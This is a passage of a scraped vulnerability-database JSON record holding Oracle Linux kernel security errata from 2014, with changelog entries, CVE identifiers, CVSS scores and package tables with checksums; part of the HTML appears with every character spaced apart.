b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : C o r r e c t h e a d e r g u a r d s t y p o ( B o r i s l a v P e t k o v ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : F i x u n s i g n e d v a r i a b l e b e i n g c h e c k e d f o r n e g a t i v e v a l u e ( j h b i r d . c h o i @ s a m s u n g . c o m ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : c o n s e r v a t i v e : F i x t h e l o g i c i n f r e q u e n c y d e c r e a s e c h e c k i n g ( S t r a t o s K a r a f o t i s ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : c o n s e r v a t i v e : F i x s a m p l i n g _ d o w n _ f a c t o r f u n c t i o n a l i t y ( S t r a t o s K a r a f o t i s ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : g o v e r n o r s : C a l c u l a t e i o w a i t t i m e o n l y w h e n n e c e s s a r y ( S t r a t o s K a r a f o t i s ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : c o n s e r v a t i v e : F i x r e l a t i o n w h e n d e c r e a s i n g f r e q u e n c y ( N a m h y u n g K i m ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : c o n s e r v a t i v e : B r e a k o u t e a r l i e r o n t h e l o w e s t f r e q u e n c y ( N a m h y u n g K i m ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : g o v e r n o r s : A v o i d u n n e c e s s a r y p e r c p u t i m e r i n t e r r u p t s ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : o n d e m a n d : D o n ' t u p d a t e s a m p l e _ t y p e i f w e d o n ' t e v a l u a t e l o a d a g a i n ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : g o v e r n o r : S e t M I N _ L A T E N C Y _ M U L T I P L I E R t o 2 0 ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : g o v e r n o r : I m p l e m e n t p e r p o l i c y i n s t a n c e s o f g o v e r n o r s ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : A d d p e r p o l i c y g o v e r n o r - i n i t / e x i t i n f r a s t r u c t u r e ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : C o n v e r t t h e c p u f r e q _ d r i v e r _ l o c k t o a r w l o c k ( N a t h a n Z i m m e r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : a c p i - c p u f r e q : D o n ' t s e t p o l i c y - > r e l a t e d _ c p u s f r o m . i n i t ( ) ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : s t a t s : d o c p u f r e q _ c p u _ p u t ( ) c o r r e s p o n d i n g t o c p u f r e q _ c p u _ g e t ( ) ( v i r e s h k u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q _ s t a t s : d o n o t r e m o v e s y s f s f i l e s i f f r e q u e n c y t a b l e i s n o t p r e s e n t ( D i r k B r a n d e w i e ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : D o n o t t r a c k g o v e r n o r n a m e f o r s c a l i n g d r i v e r s w i t h i n t e r n a l g o v e r n o r s . ( D i r k B r a n d e w i e ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : O n l y c a l l c p u f r e q _ o u t _ o f _ s y n c ( ) f o r d r i v e r t h a t i m p l e m e n t c p u f r e q _ d r i v e r . t a r g e t ( ) ( D i r k B r a n d e w i e ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : R e t r i e v e c u r r e n t f r e q u e n c y f r o m s c a l i n g d r i v e r s w i t h i n t e r n a l g o v e r n o r s ( D i r k B r a n d e w i e ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : F i x l o c k i n g i s s u e s ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : C r e a t e a m a c r o f o r u n l o c k _ p o l i c y _ r w s e m { r e a d , w r i t e } ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > - c p u f r e q : R e m o v e u n u s e d H O T P L U G _ C P U c o d e ( V i r e s h K u m a r ) [ O r a b u g : 1 8 4 6 4 1 6 9 ] b r > / p > \n \n \n b r > h 2 > R e l a t e d C V E s / h 2 > \n b r > t a b l e c e l l p a d d i n g = \" 2 \" c e l l s p a c i n g = \" 2 \" b o r d e r = \" 0 \" w i d t h = \" 1 0 0 % \" > t b o d y > \n t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 3 - 2 9 3 0 . h t m l \" > C V E - 2 0 1 3 - 2 9 3 0 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 3 - 4 5 7 9 . h t m l \" > C V E - 2 0 1 3 - 4 5 7 9 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 4 - 1 6 9 0 . h t m l \" > C V E - 2 0 1 4 - 1 6 9 0 / a > / t d > / t r > \n / t b o d y > / t a b l e > \n \n b r > h 2 > U p d a t e d P a c k a g e s / h 2 > \n b r > t a b l e c e l l p a d d i n g = \" 2 \" c e l l s p a c i n g = \" 2 \" b o r d e r = \" 0 \" w i d t h = \" 1 0 0 % \" > t b o d y > \n t r s t y l e = \" c o l o r : # F F 0 0 0 0 ; \" > t d > b > R e l e a s e / A r c h i t e c t u r e / b > t d > b > F i l e n a m e / b > / t d > t d > b > M D 5 s u m / b > / t d > t d > b > S u p e r s e d e d B y A d v i s o r y / b > / t d > / t r > \n t r > t d c o l s p a n = \" 4 \" > / t d > / t r > t r > t d > O r a c l e L i n u x 6 ( x 8 6 _ 6 4 ) / t d > t d > d t r a c e - m o d u l e s - 3 . 8 . 1 3 - 4 4 . e l 6 u e k - 0 . 4 . 3 - 4 . e l 6 . s r c . r p m / t d > t d > 2 1 4 f b d f 2 b 8 1 7 d e 9 0 e f a 0 1 7 d 3 9 e 8 2 b 2 0 0 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - 3 . 8 . 1 3 - 4 4 . e l 6 u e k . s r c . r p m / t d > t d > b 4 c 0 4 5 f f b 9 8 d 6 e d 7 e b d 3 8 7 b 3 c b f f 9 c 2 f / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > d t r a c e - m o d u l e s - 3 . 8 . 1 3 - 4 4 . e l 6 u e k - 0 . 4 . 3 - 4 . e l 6 . x 8 6 _ 6 4 . r p m / t d > t d > b e c 5 2 0 6 f 8 4 4 e f 3 5 2 a e 0 1 a 4 5 7 c a 7 8 9 8 c e / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - 3 . 8 . 1 3 - 4 4 . e l 6 u e k . x 8 6 _ 6 4 . r p m / t d > t d > e f d 5 e 6 4 3 a 7 d 0 3 c 6 f c 1 0 2 4 3 8 8 f b b 8 9 6 e 3 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - d e b u g - 3 . 8 . 1 3 - 4 4 . e l 6 u e k . x 8 6 _ 6 4 . r p m / t d > t d > 6 0 1 9 7 5 4 9 f 7 b e 7 e 6 4 d 8 d 9 8 4 b d 4 5 5 0 e 7 c 6 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - d e b u g - d e v e l - 3 . 8 . 1 3 - 4 4 . e l 6 u e k . x 8 6 _ 6 4 . r p m / t d > t d > a f 8 8 7 4 2 b a 8 8 8 b d e e b 3 c b d a e 3 6 9 d f 6 9 1 0 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - d e v e l - 3 . 8 . 1 3 - 4 4 . e l 6 u e k . x 8 6 _ 6 4 . r p m / t d > t d > 0 6 d 4 7 5 b 4 5 a 9 0 4 6 2 b b b b 2 8 2 a 5 8 2 b e 0 e a f / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - d o c - 3 . 8 . 1 3 - 4 4 . e l 6 u e k . n o a r c h . r p m / t d > t d > 7 4 1 f b 3 0 c 0 9 b c 9 1 c 1 8 2 1 c 7 6 8 9 0 3 7 b e f 7 8 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - f i r m w a r e - 3 . 8 . 1 3 - 4 4 . e l 6 u e k . n o a r c h . r p m / t d > t d > 1 1 7 c 0 0 0 3 8 8 8 6 3 5 7 9 f 7 c d c d f f 0 d f 4 0 7 5 5 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d c o l s p a n = \" 4 \" > / t d > / t r > t r > t d > O r a c l e L i n u x 7 ( x 8 6 _ 6 4 ) / t d > t d > d t r a c e - m o d u l e s - 3 . 8 . 1 3 - 4 4 . e l 7 u e k - 0 . 4 . 3 - 4 . e l 7 . s r c . r p m / t d > t d > a 5 e 0 f 0 3 6 a b d 0 c 1 9 5 1 8 2 6 5 5 0 a c a 9 a b 2 1 1 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - 3 . 8 . 1 3 - 4 4 . e l 7 u e k . s r c . r p m / t d > t d > 2 7 6 2 1 5 b f a 3 f 4 4 a 8 5 c 2 4 7 0 5 1 d 4 9 d f b 7 7 2 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > d t r a c e - m o d u l e s - 3 . 8 . 1 3 - 4 4 . e l 7 u e k - 0 . 4 . 3 - 4 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > 0 e 2 5 d 8 5 b 7 f 9 5 8 8 b 1 3 2 4 b 6 4 9 f f 6 8 7 6 8 6 b / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - 3 . 8 . 1 3 - 4 4 . e l 7 u e k . x 8 6 _ 6 4 . r p m / t d > t d > 8 5 5 3 7 c 9 0 1 8 c d c 0 c 0 9 d 0 d d 4 1 0 a e 1 d 2 1 8 1 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - d e b u g - 3 . 8 . 1 3 - 4 4 . e l 7 u e k . x 8 6 _ 6 4 . r p m / t d > t d > 6 b f b 3 4 c b e a 8 3 a e a 7 b 5 5 5 0 c 4 5 c 4 e 4 a 1 0 c / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - d e b u g - d e v e l - 3 . 8 . 1 3 - 4 4 . e l 7 u e k . x 8 6 _ 6 4 . r p m / t d > t d > 6 c 6 6 1 9 4 e 1 6 f b 4 5 2 f 2 0 9 2 7 9 9 3 2 3 9 f d a b b / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - d e v e l - 3 . 8 . 1 3 - 4 4 . e l 7 u e k . x 8 6 _ 6 4 . r p m / t d > t d > d b 3 7 8 f 2 c 6 b c 5 6 6 3 0 4 c 5 6 b 1 3 8 8 a 5 0 a 1 6 5 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - d o c - 3 . 8 . 1 3 - 4 4 . e l 7 u e k . n o a r c h . r p m / t d > t d > e f d 7 4 1 e b 4 f 6 1 0 5 8 1 7 8 c 6 f e 3 9 6 6 0 3 3 d 3 1 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - u e k - f i r m w a r e - 3 . 8 . 1 3 - 4 4 . e l 7 u e k . n o a r c h . r p m / t d > t d > 5 a 4 b f 2 3 0 4 d 9 4 5 8 b 8 d 0 0 1 b f 8 0 1 6 9 a 8 8 4 8 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 3 6 0 5 . h t m l \" > E L S A - 2 0 1 7 - 3 6 0 5 / a > / t d > / t r > \n / t b o d y > / t a b l e > \n \n \n b r > b r > \n b r > p > \n T h i s p a g e i s g e n e r a t e d a u t o m a t i c a l l y a n d h a s n o t b e e n c h e c k e d f o r e r r o r s o r o m i s s i o n s . F o r c l a r i f i c a t i o n \n o r c o r r e c t i o n s p l e a s e c o n t a c t t h e a h r e f = \" h t t p s : / / l i n u x . o r a c l e . c o m / \" > O r a c l e L i n u x U L N t e a m / a > / p > \n \n \n \n / d i v > \n ! - - \n / d i v > \n - - > \n / d i v > \n / d i v > \n \n \n d i v i d = \" m c 1 6 \" c l a s s = \" m c 1 6 v 0 \" > \n d i v c l a s s = \" m c 1 6 w 1 \" > \n h 2 > T e c h n i c a l i n f o r m a t i o n / h 2 > \n u l > \n l i > a h r e f = \" h t t p s : / / l i n u x . o r a c l e . c o m / h a r d w a r e - c e r t i f i c a t i o n s \" t a r g e t = \" _ b l a n k \" > O r a c l e L i n u x C e r t i f i e d H a r d w a r e / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / l i b r a r y / e l s p - l i f e t i m e - 0 6 9 3 3 8 . p d f \" > O r a c l e L i n u x S u p p o r t e d R e l e a s e s / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 1 \" > \n h 2 > O r a c l e L i n u x S u p p o r t / h 2 > \n u l > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / t e c h n o l o g i e s / l i n u x / O r a c l e L i n u x S u p p o r t / i n d e x . h t m l \" t a r g e t = \" _ b l a n k \" > O r a c l e L i n u x S u p p o r t / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / p r e m i e r / s e r v e r s - s t o r a g e / o v e r v i e w / i n d e x . h t m l \" t a r g e t = \" _ b l a n k \" > O r a c l e P r e m i e r S u p p o r t f o r S y s t e m s / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / a d v a n c e d - c u s t o m e r - s e r v i c e s / o v e r v i e w / \" > A d v a n c e d C u s t o m e r S e r v i c e s / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 2 \" > \n h 2 > C o n n e c t / h 2 > \n u l > \n l i c l a s s = \" f b i c o n \" > a h r e f = \" h t t p : / / w w w . f a c e b o o k . c o m / o r a c l e l i n u x \" t i t l e = \" F a c e b o o k \" n a m e = \" F a c e b o o k \" t a r g e t = \" _ b l a n k \" i d = \" F a c e b o o k \" > F a c e b o o k / a > / l i > \n l i c l a s s = \" t w i c o n \" > a h r e f = \" h t t p : / / w w w . t w i t t e r . c o m / O r a c l e L i n u x \" t i t l e = \" T w i t t e r \" n a m e = \" T w i t t e r \" t a r g e t = \" _ b l a n k \" i d = \" T w i t t e r \" > T w i t t e r / a > / l i > \n l i c l a s s = \" i n i c o n \" > a h r e f = \" h t t p : / / w w w . l i n k e d i n . c o m / g r o u p s ? g i d = 1 2 0 2 3 8 \" t i t l e = \" L i n k e d I n \" n a m e = \" L i n k e d I n \" t a r g e t = \" _ b l a n k \" i d = \" L i n k e d I n \" > L i n k e d I n / a > / l i > \n l i c l a s s = \" y t i c o n \" > a h r e f = \" h t t p : / / w w w . y o u t u b e . c o m / o r a c l e l i n u x c h a n n e l \" t i t l e = \" Y o u T u b e \" n a m e = \" Y o u T u b e \" t a r g e t = \" _ b l a n k \" i d = \" Y o u T u b e \" > Y o u T u b e / a > / l i > \n l i c l a s s = \" b l o g i c o n \" > a h r e f = \" h t t p : / / b l o g s . o r a c l e . c o m / l i n u x \" t i t l e = \" B l o g \" n a m e = \" B l o g \" > B l o g / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 3 \" > \n h 2 > C o n t a c t U s / h 2 > \n u l > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / c o r p o r a t e / c o n t a c t / g l o b a l - 0 7 0 5 1 1 . h t m l \" > G l o b a l c o n t a c t s / a > / l i > \n l i > O r a c l e 1 - 8 0 0 - 6 3 3 - 0 6 9 1 / l i > \n / u l > \n / d i v > \n / d i v > \n / d i v > \n \n d i v i d = \" m c 0 4 \" c l a s s = \" m c 0 4 v 1 \" > \n d i v c l a s s = \" m c 0 4 w 1 \" > \n a h r e f = \" h t t p : / / o r a c l e . c o m \" > i m g s r c = \" / / w w w . o r a c l e i m g . c o m / a s s e t s / m c 0 4 - f o o t e r - l o g o . p n g \" b o r d e r = \" 0 \" a l t = \" s o f t w a r e . h a r d w a r e . c o m p l e t e \" / > / a > \n / d i v > \n \n d i v c l a s s = \" m c 0 4 w 2 \" > \n a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / s u b s c r i b e / i n d e x . h t m l \" > S u b s c r i b e / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / c o r p o r a t e / e m p l o y m e n t / i n d e x . h t m l \" > C a r e e r s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / c o r p o r a t e / c o n t a c t / i n d e x . h t m l \" > C o n t a c t U s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / c o p y r i g h t . h t m l \" > L e g a l N o t i c e s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / t e r m s . h t m l \" > T e r m s o f U s e / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / p r i v a c y . h t m l \" > Y o u r P r i v a c y R i g h t s / a > \n / d i v > \n / d i v > \n / d i v > \n / b o d y > \n / h t m l > \n ", "reporter": "Oracle", "published": "2014-08-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "oraclelinux", "title": "Unbreakable Enterprise kernel security and bug fix update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943", "CVE-2014-3145", "CVE-2013-4579", "CVE-2014-3144", "CVE-2014-0181", "CVE-2013-2930", "CVE-2014-4667", "CVE-2014-1690"], "modified": "2014-08-22T00:00:00", "id": "ELSA-2014-3070", "href": "http://linux.oracle.com/errata/ELSA-2014-3070.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:16:05", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-tools-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "kernel-tools", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-abi-whitelists-3.10.0-123.6.3.el7.noarch.rpm", "packageName": "kernel-abi-whitelists", "arch": "noarch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-3.10.0-123.6.3.el7.src.rpm", "packageName": "kernel", "arch": "src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "kernel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-devel-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "kernel-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "python-perf-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "python-perf", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-tools-libs-devel-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "kernel-tools-libs-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-debug-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "kernel-debug", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-doc-3.10.0-123.6.3.el7.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-headers-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "kernel-headers", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-debug-devel-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "kernel-debug-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "perf-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "perf", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.6.3.el7", "packageFilename": "kernel-tools-libs-3.10.0-123.6.3.el7.x86_64.rpm", "packageName": "kernel-tools-libs", "arch": "x86_64", "operator": "lt"}], "description": "[3.10.0-123.6.3]\r\n- Oracle Linux certificates (Alexey Petrenko)\r\n \n[3.10.0-123.6.3]\r\n- [net] l2tp_ppp: fail when socket option level is not SOL_PPPOL2TP (Petr Matousek) [1119465 1119466] {CVE-2014-4943}\r\n \n[3.10.0-123.6.2.el7]\r\n- [s390] ptrace: correct insufficient sanitization when setting psw mask (Hendrik Brueckner) [1114090 1113673]\r\n \n[3.10.0-123.6.1.el7]\r\n- [x86] ptrace: force IRET path after a ptrace_stop() (Oleg Nesterov) [1115934 1115935] {CVE-2014-4699}\r\n \n[3.10.0-123.5.1.el7]\r\n- [net] ipv4/tunnels: fix an oops when using ipip/sit with IPsec (Jiri Pirko) [1114957 1108857]\r\n- [scsi] Add timeout to avoid infinite command retry (Ewan Milne) [1114468 1061871]\r\n- [net] filter: let bpf_tell_extensions return SKF_AD_MAX (Jiri Benc) [1114404 1079524]\r\n- [net] filter: introduce SO_BPF_EXTENSIONS (Jiri Benc) [1114404 1079524]\r\n- [net] sctp: Fix sk_ack_backlog wrap-around problem (Daniel Borkmann) [1113971 1112726] {CVE-2014-4667}\r\n- [tty] Set correct tty name in 'active' sysfs attribute (Denys Vlasenko) [1113467 1066403]\r\n- [powerpc] tm: Disable IRQ in tm_recheckpoint (Larry Woodman) [1113150 1088224]\r\n- [scsi] qla2xxx: Update version number to 8.06.00.08.07.0-k3 (Chad Dupuis) [1112389 1090378]\r\n- [scsi] qla2xxx: Reduce the time we wait for a command to complete during SCSI error handling (Chad Dupuis) [11123\r\n89 1090378]\r\n- [scsi] qla2xxx: Clear loop_id for ports that are marked lost during fabric scanning (Chad Dupuis) [1112389 109037\r\n8]\r\n- [scsi] qla2xxx: Avoid escalating the SCSI error handler if the command is not found in firmware (Chad Dupuis) [11\r\n12389 1090378]\r\n- [scsi] qla2xxx: Don't check for firmware hung during the reset context for ISP82XX (Chad Dupuis) [1112389 1090378\r\n]\r\n- [scsi] qla2xxx: Issue abort command for outstanding commands during cleanup when only firmware is alive (Chad Dup\r\nuis) [1112389 1090378]\r\n- [fs] nfs: Apply NFS_MOUNT_CMP_FLAGMASK to nfs_compare_remount_data() (Scott Mayhew) [1109407 1103805]\r\n- [ethernet] bnx2x: Fix kernel crash and data miscompare after EEH recovery (Michal Schmidt) [1107721 1101808]\r\n- [net] gro: restore frag0 optimization (and fix crash) (Michal Schmidt) [1099950 1069741]\r\n- [watchdog] hpwdt: display informative string (Nigel Croxon) [1096961 1074038]\r\n- [net] Use netlink_ns_capable to verify the permisions of netlink messages (Jiri Benc) [1094271 1094272] {CVE-2014\r\n-0181}\r\n- [net] netlink: Add variants of capable for use on netlink messages (Jiri Benc) [1094271 1094272] {CVE-2014-0181}\r\n- [net] diag: Move the permission check in sock_diag_put_filterinfo to packet_diag_dump (Jiri Benc) [1094271 109427\r\n2] {CVE-2014-0181}\r\n- [net] netlink: Rename netlink_capable netlink_allowed (Jiri Benc) [1094271 1094272] {CVE-2014-0181}\r\n- [net] diag: Fix ns_capable check in sock_diag_put_filterinfo (Jiri Benc) [1094271 1094272] {CVE-2014-0181}\r\n- [net] netlink: Fix permission check in netlink_connect() (Jiri Benc) [1094271 1094272] {CVE-2014-0181}\r\n- [kernel] cputime: Fix jiffies based cputime assumption on steal accounting (Frederic Weisbecker) [1090974 1047732\r\n]\r\n- [kernel] cputime: Bring cputime -> nsecs conversion (Frederic Weisbecker) [1090974 1047732]\r\n- [kernel] cputime: Default implementation of nsecs -> cputime conversion (Frederic Weisbecker) [1090974 1047732]\r\n- [net] mac80211: fix crash due to AP powersave TX vs. wakeup race (Jacob Tanenbaum) [1083533 1083534] {CVE-2014-27\r\n06}\r\n- [wireless] ath9k: tid->sched race in ath_tx_aggr_sleep() (Jacob Tanenbaum) [1083251 1083252] {CVE-2014-2672}\r\n- [powerpc] tm: Fix crash when forking inside a transaction (Radomir Vrbovsky) [1083214 1083215] {CVE-2014-2673}\r\n- [fs] aio: fix plug memory disclosure and fix reqs_active accounting backport (Jeff Moyer) [1094604 1094605] {CVE-\r\n2014-0206}\r\n- [fs] aio: plug memory disclosure and fix reqs_active accounting (Mateusz Guzik) [1094604 1094605] {CVE-2014-0206}\r", "edition": 1, "reporter": "Oracle", "published": "2014-08-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "kernel security and bug fix update", "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-2672", "CVE-2014-4699", "CVE-2014-4943", "CVE-2014-0206", "CVE-2014-3534", "CVE-2014-2673", "CVE-2014-0181", "CVE-2014-4667", "CVE-2014-2706"], "modified": "2014-08-06T00:00:00", "id": "ELSA-2014-1023", "href": "http://linux.oracle.com/errata/ELSA-2014-1023.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:25:09", "references": ["https://access.redhat.com/errata/RHSA-2014:0923"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": 